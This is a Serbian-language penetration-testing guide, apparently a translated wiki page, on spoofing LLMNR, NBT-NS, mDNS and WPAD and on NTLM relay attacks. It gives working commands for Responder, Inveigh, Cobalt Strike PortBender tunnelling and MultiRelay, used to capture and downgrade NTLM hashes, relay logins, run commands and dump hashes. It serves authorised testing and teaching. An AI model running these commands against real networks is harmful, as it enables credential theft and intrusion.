Spoofing LLMNR, NBT-NS, mDNS/DNS i WPAD i Relay napadi

Reading time: 6 minutes

Mrežni protokoli

Protokoli za lokalno rešavanje hostova

• LLMNR, NBT-NS i mDNS:
• Microsoft i drugi operativni sistemi koriste LLMNR i NBT-NS za lokalno rešavanje imena kada DNS zakaže. Slično, Apple i Linux sistemi koriste mDNS.
• Ovi protokoli su podložni presretanju i spoofingu zbog svoje neautentifikovane, broadcast prirode preko UDP-a.
• Responder se može koristiti za impersonaciju usluga slanjem lažnih odgovora hostovima koji upituju ove protokole.
• Dodatne informacije o impersonaciji usluga koristeći Responder mogu se naći ovde.

Protokol za automatsko otkrivanje web proxy-a (WPAD)

• WPAD omogućava pretraživačima da automatski otkriju postavke proxy-a.
• Otkriće se olakšava putem DHCP-a, DNS-a, ili povratka na LLMNR i NBT-NS ako DNS zakaže.
• Responder može automatizovati WPAD napade, usmeravajući klijente na zloćudne WPAD servere.

Responder za trovanje protokola

• Responder je alat koji se koristi za trovanje LLMNR, NBT-NS i mDNS upita, selektivno odgovarajući na osnovu tipova upita, prvenstveno cilja SMB usluge.
• Dolazi unapred instaliran u Kali Linux-u, konfigurisanje se vrši na /etc/responder/Responder.conf.
• Responder prikazuje uhvaćene hešove na ekranu i čuva ih u direktorijumu /usr/share/responder/logs.
• Podržava i IPv4 i IPv6.
• Windows verzija Responder-a je dostupna ovde.

Pokretanje Responder-a

• Da biste pokrenuli Responder sa podrazumevanim postavkama: responder -I <Interface>
• Za agresivnije ispitivanje (sa potencijalnim nuspojavama): responder -I <Interface> -P -r -v
• Tehnike za hvatanje NTLMv1 izazova/odgovora radi lakšeg krakenja: responder -I <Interface> --lm --disable-ess
• WPAD impersonacija može se aktivirati sa: responder -I <Interface> --wpad
• NetBIOS zahtevi mogu se rešiti na IP napadača, a može se postaviti i proxy za autentifikaciju: responder.py -I <interface> -Pv

DHCP trovanje sa Responder-om

• Spoofing DHCP odgovora može trajno otrovati rutiranje informacije žrtve, nudeći diskretniju alternativu ARP trovanju.
• Zahteva precizno poznavanje konfiguracije ciljne mreže.
• Pokretanje napada: ./Responder.py -I eth0 -Pdv
• Ova metoda može efikasno uhvatiti NTLMv1/2 hešove, ali zahteva pažljivo rukovanje kako bi se izbeglo ometanje mreže.

Hvatanje kredencijala sa Responder-om

• Responder će impersonirati usluge koristeći gore pomenute protokole, hvatajući kredencijale (obično NTLMv2 Challenge/Response) kada korisnik pokuša da se autentifikuje protiv spoofovanih usluga.
• Mogu se pokušati da se downgrade-uje na NetNTLMv1 ili da se onemogući ESS radi lakšeg krakenja kredencijala.

Važno je napomenuti da se korišćenje ovih tehnika mora vršiti legalno i etički, osiguravajući odgovarajuću autorizaciju i izbegavajući ometanje ili neovlašćen pristup.

Inveigh

Inveigh je alat za penetracione testere i red timere, dizajniran za Windows sisteme. Nudi funkcionalnosti slične Responder-u, obavljajući spoofing i man-in-the-middle napade. Alat se razvio iz PowerShell skripte u C# binarni, sa Inveigh i InveighZero kao glavnim verzijama. Detaljni parametri i uputstva mogu se naći u wiki.

Inveigh se može koristiti kroz PowerShell:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Ili izvršeno kao C# binarni fajl:

Inveigh.exe

NTLM Relay Attack

Ovaj napad koristi SMB autentifikacione sesije za pristup ciljnim mašinama, omogućavajući sistemsku ljusku ako je uspešan. Ključni preduslovi uključuju:

• Autentifikovani korisnik mora imati lokalni administratorski pristup na preusmerenoj host mašini.
• SMB potpisivanje treba biti onemogućeno.

445 Port Forwarding and Tunneling

U scenarijima gde direktno umrežavanje nije izvodljivo, saobraćaj na portu 445 treba preusmeriti i tunelovati. Alati poput PortBender pomažu u preusmeravanju saobraćaja sa porta 445 na drugi port, što je od suštinskog značaja kada je dostupan lokalni administratorski pristup za učitavanje drajvera.

PortBender podešavanje i rad u Cobalt Strike:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

Ostali alati za NTLM relays napad

• Metasploit: Podešen sa proxy-ima, lokalnim i udaljenim detaljima hosta.
• smbrelayx: Python skripta za relaying SMB sesija i izvršavanje komandi ili postavljanje backdoor-a.
• MultiRelay: Alat iz Responder paketa za relaying specifičnih korisnika ili svih korisnika, izvršavanje komandi ili dumpovanje hash-eva.

Svaki alat može biti konfigurisan da radi kroz SOCKS proxy ako je potrebno, omogućavajući napade čak i sa indirektnim pristupom mreži.

MultiRelay operacija

MultiRelay se izvršava iz /usr/share/responder/tools direktorijuma, ciljajući specifične IP adrese ili korisnike.

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

Ovi alati i tehnike čine sveobuhvatan skup za sprovođenje NTLM Relay napada u raznim mrežnim okruženjima.

Prisiljavanje NTLM prijava

Na Windows-u možda ćete moći da prisilite neke privilegovane naloge da se autentifikuju na proizvoljnim mašinama. Pročitajte sledeću stranicu da biste saznali kako:

Force NTLM Privileged Authentication

Reference

• https://intrinium.com/smb-relay-attack-tutorial/
• https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
• https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
• https://intrinium.com/smb-relay-attack-tutorial/
• https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html